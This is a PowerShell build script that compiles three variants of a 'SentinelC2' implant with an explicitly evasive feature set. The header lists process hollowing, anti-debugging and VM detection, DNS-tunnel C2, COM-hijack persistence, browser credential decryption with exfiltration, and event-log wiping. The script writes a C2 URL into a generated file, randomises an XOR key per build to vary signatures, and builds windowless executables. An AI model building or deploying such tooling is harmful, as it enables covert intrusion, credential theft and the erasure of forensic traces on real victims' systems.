# build_hardened.ps1 — Build the hardened SentinelC2 agent
#
# Compiles the hardened agent with all evasion and resilience modules
# enabled. Produces a single-file executable with:
#   - Process hollowing for shell execution
#   - Direct NT syscall-based file I/O
#   - Enhanced anti-analysis (sleep obfuscation, debugger/VM detection)
#   - DNS tunneling + HTTPS CDN fallback C2 channels
#   - COM hijacking + auto-repair persistence
#   - Streaming exfiltration with browser credential decryption
#   - Enhanced self-destruct (memory wipe, event log clearing)
#
# Prerequisites:
#   - Nim 2.2.10 at D:\appdata\nim-2.2.10\bin\nim.exe (or set $env:NIM)
#   - Nimble packages: nimcrypto, winim, ws
#   - MinGW gcc (for C codegen)
#
# Usage:
#   .\build_hardened.ps1
#
# Output: build\agent_hardened_silent.exe
#         build\agent_hardened_engagement.exe
#         build\agent_hardened_aggressive.exe

$ErrorActionPreference = "Stop"
$ProjectDir = $PSScriptRoot
$BuildDir = Join-Path $ProjectDir "build"
$SrcDir = $ProjectDir
$Nim = if ($env:NIM) { $env:NIM } else { "nim" }

# Verify toolchain
if (-not (Get-Command $Nim -ErrorAction SilentlyContinue)) {
    if (-not (Test-Path $Nim)) {
        Write-Error "nim not found. Set `$env:NIM or add nim to PATH."
        exit 1
    }
}

# Generate a default c2_override.nim so agent_hardened.nim's `include`
# resolves. The build_deploy.ps1 script overrides this with a real
# C2 URL and pinned cert; this fallback uses the localhost default
# from the original agent code.
$DefaultOverride = Join-Path $ProjectDir "c2_override.nim"
$DefaultOverrideContent = @"
# Auto-generated by build_hardened.ps1. Replace by running
# build_deploy.ps1 with your C2 URL and pinned cert to bake them in.
const C2_DEPLOY_URL* = "ws://127.0.0.1:8443"
const PINNED_CERT_DEPLOY_PEM* = ""
"@
Set-Content -Path $DefaultOverride -Value $DefaultOverrideContent -Encoding UTF8 -NoNewline

# Generate per-build XOR key
function New-XorKeyNim {
    param([string]$OutPath)
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $bytes = New-Object byte[] 32
    $rng.GetBytes($bytes)
    $hexParts = @()
    foreach ($b in $bytes) { $hexParts += ("0x{0:x2}" -f $b) }
    $keyBody = $hexParts -join ", "
    $content = "# Auto-generated per-build XOR key. Do NOT edit.`n# This file is regenerated by build_hardened.ps1 before each compile.`nconst XorKey: array[32, byte] = [byte $keyBody]`n"
    Set-Content -Path $OutPath -Value $content -Encoding UTF8 -NoNewline
}

# Clean and recreate build dir
if (Test-Path $BuildDir) {
    Remove-Item -Recurse -Force $BuildDir
}
New-Item -ItemType Directory -Path $BuildDir | Out-Null

# Common flags for hardened agent
$BaseFlags = @(
    "c",
    "-d:release",
    "-d:ssl",
    "--opt:size",
    "--app:gui",
    "--passL:-s",
    "--passL:-lmingw32",
    "--passL:-lws2_32",
    "--passL:-lsecur32",
    "--passL:-lcrypt32",
    "--passL:-ladvapi32",
    "--passL:-lshell32",
    "--passL:-lole32",
    "--passL:-lntdll",
    "--passL:-liphlpapi",
    "--passL:-lwevtapi",
    "--hint[Conf]:off",
    "--warning[UnusedImport]:off",
    "--warning[Deprecated]:off"
)

# Variants to build
$Variants = @{
    "agent_hardened_silent.exe"      = @()
    "agent_hardened_engagement.exe"  = @("-d:variant_engagement")
    "agent_hardened_aggressive.exe"  = @("-d:variant_aggressive")
}

foreach ($kv in $Variants.GetEnumerator()) {
    $name = $kv.Key
    $defines = $kv.Value

    # Generate unique XOR key for this variant
    $xorKeyPath = Join-Path $SrcDir "xorkey.nim"
    New-XorKeyNim -OutPath $xorKeyPath

    Write-Host "[*] Building $name ..." -ForegroundColor Cyan

    # Relax error preference around Nim call (Nim writes progress dots to stderr)
    $prevEAP = $ErrorActionPreference
    $ErrorActionPreference = "Continue"

    # Build flags: add hardened module path and defines
    $flags = @() + $BaseFlags
    $flags += $defines
    $flags += @(
        "--path:" + (Join-Path $SrcDir "hardened"),
        "--nimcache:" + (Join-Path $BuildDir ("cache_" + $name.Replace(".exe", "")))
    )

    try {
        # Redirect stderr to stdout; Nim writes compile progress dots to stderr
        & $Nim @flags `
            --out:(Join-Path $BuildDir $name) `
            (Join-Path $SrcDir "hardened\agent_hardened.nim") 2>&1 | Out-Null
    } finally {
        # Always clean up so a stale 32-byte key can't poison a
        # later baseline build with the wrong key length.
        if (Test-Path $xorKeyPath) { Remove-Item -Force $xorKeyPath }
    }

    $ErrorActionPreference = $prevEAP

    if ($LASTEXITCODE -ne 0) {
        Write-Warning "$name build failed (continuing with other variants)"
    } else {
        Write-Host "[+] $name built successfully" -ForegroundColor Green
    }
}

# Clean up XOR key
$xorKeyPath = Join-Path $SrcDir "xorkey.nim"
if (Test-Path $xorKeyPath) { Remove-Item -Force $xorKeyPath }

# Summary
Write-Host ""
Write-Host "[+] Hardened build complete. Output in: $BuildDir" -ForegroundColor Green
Get-ChildItem $BuildDir -Filter "agent_hardened_*.exe" -ErrorAction SilentlyContinue | Format-Table Name,
    @{N='SizeMB';E={[math]::Round($_.Length/1MB,2)}} -AutoSize

# Post-build verification
Write-Host "`n[*] Running post-build verification..." -ForegroundColor Cyan
$PeCheck = Join-Path $ProjectDir "tests\pe_imports.py"
if (Test-Path $PeCheck) {
    Get-ChildItem $BuildDir -Filter "agent_hardened_*.exe" | ForEach-Object {
        Write-Host "  Checking imports for $($_.Name)..." -ForegroundColor Gray
        & python $PeCheck $_.FullName
    }
}
